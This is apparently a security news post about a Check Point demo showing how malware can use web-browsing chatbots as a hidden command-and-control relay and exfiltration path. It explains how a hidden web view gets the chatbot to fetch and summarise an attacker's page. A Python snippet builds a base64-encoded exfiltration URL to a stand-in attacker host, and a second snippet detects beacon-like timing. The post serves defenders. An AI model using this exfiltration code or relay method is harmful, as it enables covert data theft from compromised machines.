Thursday, February 19, 2026

Web browsing AI chatbots can be abused as malware relays

According to a demo from Check Point Research, AI chatbots with web-browsing features can be abused as malware relays. Instead of calling a traditional command-and-control server, malware can use a chatbot's URL-fetching capability to retrieve instructions from a malicious page and relay the response back to the infected computer.

In many environments, traffic to major AI services is already treated as routine, so command-and-control can blend into normal web usage. The same path can also be used to exfiltrate data.

Microsoft addressed the work in a statement, characterizing it as a post-compromise communications issue. It said that once a device is compromised, attackers will attempt to abuse any available service, including AI-based ones, and called for defense-in-depth security controls to prevent infections and limit their consequences.

The demo turns the chat into a relay

The concept is simple. The malware makes the AI web interface load a URL and summarize what it finds, then searches the returned text for an embedded instruction.

Check Point said it tested the technique against Grok and Microsoft Copilot through their web interfaces. An important detail is access: the flow deliberately avoids developer APIs, and in the tested scenarios it works without an API key, which lowers the barrier to abuse.

For data exfiltration, the mechanism can also run in reverse. One method described is to place data in URL query parameters and rely on the AI-triggered request to deliver it to the attacker's infrastructure. Simple encoding can further obfuscate the data being sent, making naive content filtering less reliable.
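The encoding trick described above can be sketched like this; the domain, endpoint, and parameter name are placeholders, and base64 stands in for whatever simple encoding an attacker might pick.

```python
import base64
from urllib.parse import urlencode

def build_exfil_url(host_details: dict) -> str:
    """Pack host details into a single query parameter. Base64 hides plain
    keywords (hostnames, usernames) from naive content filters."""
    payload = ";".join(f"{k}={v}" for k, v in sorted(host_details.items()))
    encoded = base64.urlsafe_b64encode(payload.encode()).decode()
    # attacker.example is a placeholder for adversary-controlled infrastructure.
    return "https://attacker.example/beacon?" + urlencode({"q": encoded})

print(build_exfil_url({"host": "WIN-01", "user": "alice"}))
```

A filter that only scans for readable strings sees one opaque token, which is why the article notes that simple encoding already degrades content inspection.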

Why it’s harder to see

This is not a new class of malware; it is a well-known command-and-control pattern embedded in a service that many companies actively enable. If browser-enabled AI services are left open by default, an infected system can hide behind domains that appear low-risk.

Check Point also highlights how common the plumbing is. The demo uses WebView2, an embedded browser component present on modern Windows machines. In the described workflow, a program collects basic host details, opens a hidden web view onto an AI service, fires a URL request, and then parses the response to extract the next command. To monitoring tools this can resemble normal application behavior rather than an obvious signal.

What security teams should do

Treat web-enabled chatbots like any other highly trusted cloud app that can be abused after compromise. Where these services are permitted, look for automation patterns: repeated URL loads, unusual prompt rhythms, or traffic volumes that do not match human usage.
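One simple heuristic for the automation patterns mentioned above is request cadence: beacons tend to fire at near-fixed intervals, while human chat usage is bursty. A sketch with made-up timestamps and an illustrative threshold:

```python
from statistics import pstdev

def looks_automated(timestamps: list[float], max_jitter_s: float = 1.0) -> bool:
    """Flag request trains to an AI domain whose inter-arrival times are
    suspiciously regular; the jitter threshold is illustrative, not tuned."""
    if len(timestamps) < 3:
        return False
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return pstdev(gaps) < max_jitter_s

beacon = [0.0, 30.1, 60.0, 90.2, 120.1]   # ~every 30 s, machine-like
human = [0.0, 4.0, 95.0, 110.0, 400.0]    # bursty, human-like
print(looks_automated(beacon), looks_automated(human))  # True False
```

In practice this would run over proxy or firewall logs grouped by source host and AI domain, alongside the volume and prompt-rhythm checks the article suggests.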

AI browsing capabilities may belong on managed devices and in specific roles, not on every computer. The open question is scale: this is a demo, and it does not quantify success rates against hardened fleets. What to watch next is whether vendors add stronger automation detection to web chat, and whether defenders start treating AI services as potential post-compromise channels.
